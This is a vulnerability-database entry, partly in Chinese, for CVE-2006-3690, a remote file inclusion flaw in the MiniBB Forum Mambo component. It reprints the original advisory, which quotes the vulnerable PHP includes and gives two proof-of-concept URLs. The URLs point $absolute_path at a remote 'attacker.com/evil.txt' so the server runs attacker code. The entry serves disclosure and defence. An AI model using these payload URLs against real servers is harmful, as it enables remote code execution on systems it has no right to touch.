MiniBB多个远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110619 漏洞类型 输入验证
发布时间 2006-07-17 更新时间 2006-08-15
CVE编号 CVE-2006-3690 CNNVD-ID CNNVD-200607-359
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2030
https://cxsecurity.com/issue/WLB-2006070082
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200607-359
|漏洞详情
MiniBB(全称MinimalisticBulletinBoard)是一套免费、开源的互联网论坛软件。该软件支持多种论坛样式、多界面语言、多时区、插件扩展等。MiniBB处理用户请求时存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上执行任意命令。MiniBB的com_minibb.php和index.php脚本没能对absolute_path变量做充分的检查过滤,攻击者可以使脚本包含远程服务器上的PHP代码执行。
|漏洞EXP
---------------------------------------------------------------------------------------------

MiniBB Forum Mambo Component <= 1.5a Remote File Include Vulnerabilities
-----------------------------------------------------------------------------------------------

 
Author          : Ahmad Maulana a.k.a Matdhule
Date            : July 14th 2006
Location        : Indonesia, Jakarta
Web             : http://advisories.echo.or.id/adv/adv39-matdhule-2006.txt
                  http://www.securityfocus.com/bid/18998
Critical Lvl    : Highly critical
Impact          : System access
Where           : From Remote
------------------------------------------------------------------------

 
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# MiniBB Forum

Application     : MiniBB Forum (com_minibb.php & index.php)
version         : 1.5a

------------------------------------------------------------------------

 
Vulnerability:
~~~~~~~~~~~~~~~
 
# MiniBB Forum

In folder components we found vulnerability script com_minibb.php.

-----------------------com_minibb.php-----------------------------------
...................

If ($current=="bb_admin"){
  include("$absolute_path/components/minibb/bb_admin.php");
} else {
  include("$absolute_path/components/minibb/index.php");
...................

------------------------------------------------------------------------

In folder minibb we found vulnerability script index.php.

-----------------------index.php----------------------------------------
..............................

define ('INCLUDED776',1);

include ($absolute_path.'/components/minibb/setup_options.php');
if (isset($HTTP_COOKIE_VARS[$cookiename.'Language']) and $langCook=${$cookiename.'Language'}) { if
(file_exists("$absolute_path/components/minibb/lang/{$langCook}.php")) $lang=$langCook; }
include ($absolute_path.'/components/minibb/setup_'.$DB.'.php');
..............................

Variables $absolute_path are not properly sanitized. When register_globals=on
and allow_fopenurl=on an attacker can exploit this vulnerability with a simple php injection script.
 
Proof Of Concept:
~~~~~~~~~~~~~~~~
 
http://[target]/[path]/components/com_minibb.php?absolute_path=http://attacker.com/evil.txt?
http://[target]/[path]/components/minibb/index.php?absolute_path= http://attacker.com/evil.txt?

Solution:
~~~~~~~~
 
sanitize variabel $absolute_path.
 
 
------------------------------------------------------------------------
---
Shoutz:
~~~~~~
~ solpot a.k.a chris, J4mbi  H4ck3r for the hacking lesson :)
~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,anonymous
~ bius, lapets, ghoz, t4mbun_hacker, NpR, h4ntu, thama
~ newbie_hacker@yahoogroups.com, jasakom_perjuangan@yahoogroups.com
~ #mardongan #jambihackerlink #e-c-h-o @ irc.dal.net
------------------------------------------------------------------------
---
Contact:
~~~~~~~
 
     matdhule[at]gmail[dot]com
     
-------------------------------- [ EOF ]---------------------------------- 

# milw0rm.com [2006-07-17]
|参考资料

来源:XF
名称:minibb-multiple-scripts-file-include(27749)
链接:http://xforce.iss.net/xforce/xfdb/27749
来源:BID
名称:18998
链接:http://www.securityfocus.com/bid/18998
来源:BUGTRAQ
名称:20060715MiniBBForum<=1.5aRemoteFileIncludeVulnerabilities
链接:http://www.securityfocus.com/archive/1/archive/1/440132/100/0/threaded
来源:SECTRACK
名称:1016507
链接:http://securitytracker.com/id?1016507
来源:OSVDB
名称:28594
链接:http://www.osvdb.org/28594
来源:MILW0RM
名称:2030
链接:http://www.milw0rm.com/exploits/2030
来源:SREASON
名称:1245
链接:http://securityreason.com/securityalert/1245
来源:MISC
链接:http://advisories.echo.or.id/adv/adv39-matdhule-2006.txt